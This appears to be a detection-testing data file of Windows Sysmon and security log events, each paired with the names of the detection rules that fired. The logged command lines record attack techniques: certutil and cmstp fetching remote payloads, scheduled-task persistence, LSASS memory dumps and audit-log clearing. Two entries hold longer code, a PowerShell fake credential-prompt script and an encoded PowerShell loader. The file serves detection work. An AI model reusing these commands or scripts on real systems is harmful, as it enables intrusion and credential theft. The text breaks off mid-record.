https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ParentProcessId":7088,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010E37B8D00","ProcessId":4520,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.410"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4980,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:20.459065Z"}},"Version":5}}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.2.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=89030EB0DE2B856B47105CA67DAAC722ABAF0BDF,MD5=D9818B3C3BC0AF0A5374C71272581C08,SHA256=DB3F360BDB292C0679C13149AC6F454F7DCE768BDE559D87CE718023A6985A0D,IMPHASH=109BA8ED3C458360A74EA1216207CA09","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6661-5D3F-0000-00107AB88D00","ParentProcessId":6428,"ProcessGuid":"747F3D96-6661-5D3F-0000-0010CBC88D00","ProcessId":6820,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:25.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4985,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:25.659355Z"}},"Version":5}}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-6666-5D3F-0000-0010AE068E00","ParentProcessId":1464,"ProcessGuid":"747F3D96-6666-5D3F-0000-0010DF098E00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:30.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4989,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:30.807635Z"}},"Version":5}}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ProcessId":2916,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.243"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5000,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:40.261289Z"}},"Version":5}}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Task Scheduler Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69","Image":"C:\\Windows\\System32\\schtasks.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ParentProcessId":2916,"ProcessGuid":"747F3D96-6670-5D3F-0000-0010F9148F00","ProcessId":7076,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.755"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5002,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:40.889027Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":768617,"Execution":{"#attributes":{"ProcessID":264,"ThreadID":796}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-15T19:28:17.594374Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AC38-5CB8-0000-0010365E0800","ProcessId":3576,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 16:56:24.833"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":14,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T16:56:24.893827Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AD19-5CB8-0000-0010F4F40C00","ProcessId":3980,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 17:00:09.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":24,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T17:00:09.977481Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.311","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sysmon.evtx.lnk","UtcTime":"2019-04-18 17:03:03.311"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":32,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T17:03:03.321806Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.441","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HTools (vboxsrv) (D).lnk","UtcTime":"2019-04-18 17:03:03.441"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":33,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T17:03:03.441979Z"}},"Version":2}}}},{"detection":["PowerShell Credential Prompt"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"c7ca7056-b317-4fff-b796-05d8ef896dcd","ScriptBlockText":"function Invoke-LoginPrompt{\n$cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\")\n$username = \"$env:username\"\n$domain = \"$env:userdomain\"\n$full = \"$domain\" + \"\\\" + \"$username\"\n$password = $cred.GetNetworkCredential().password\nAdd-Type -assemblyname System.DirectoryServices.AccountManagement\n$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\nwhile($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){\n $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\")\n $username = \"$env:username\"\n $domain = \"$env:userdomain\"\n $full = \"$domain\" + \"\\\" + \"$username\"\n $password = $cred.GetNetworkCredential().password\n Add-Type -assemblyname System.DirectoryServices.AccountManagement\n $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\n $DS.ValidateCredentials(\"$full\", \"$password\") | out-null\n }\n $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password\n $output\n R{START_PROCESS}\n}\nInvoke-LoginPrompt"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"B5ABE6C2-675C-0001-A601-ACB55C67D501"}},"EventID":4104,"EventRecordID":1123,"Execution":{"#attributes":{"ProcessID":5500,"ThreadID":356}},"Keywords":"0x0","Level":3,"Opcode":15,"Provider":{"#attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"}},"Security":{"#attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"}},"Task":2,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-09T13:35:09.315230Z"}},"Version":1}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":4987,"Execution":{"#attributes":{"ProcessID":824,"ThreadID":6060}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T19:27:55.274060Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"IEWIN7","SubjectLogonId":"0xffa8","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"}}}}},{"detection":["Godmode Sigma Rule","Suspicious Encoded PowerShell Command Line","Shells Spawned by Web Servers"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\Temp\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B26B-5CEA-0000-002023240800","LogonId":"0x82423","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-3251-5CEB-0000-00109E06E100","ParentProcessId":748,"ProcessGuid":"365ABB72-3D4A-5CEB-0000-0010FA93FD00","ProcessId":2584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-27 01:28:42.700"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":5875,"Execution":{"#attributes":{"ProcessID":324,"ThreadID":2260}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T01:28:42.711005Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","Procdump Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 19:09:41.318","Image":"C:\\Users\\IEUser\\Desktop\\procdump.exe","ProcessGuid":"365ABB72-9B75-5C8E-0000-0010013F1200","ProcessId":1856,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.exe_190317_120941.dmp","UtcTime":"2019-03-17 19:09:41.318"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4433,"Execution":{"#attributes":{"ProcessID":344,"ThreadID":2032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T19:09:41.328868Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 19:10:02.058","Image":"C:\\Windows\\system32\\taskmgr.exe","ProcessGuid":"365ABB72-9B85-5C8E-0000-0010C4CC1200","ProcessId":3576,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\lsass (2).DMP","UtcTime":"2019-03-17 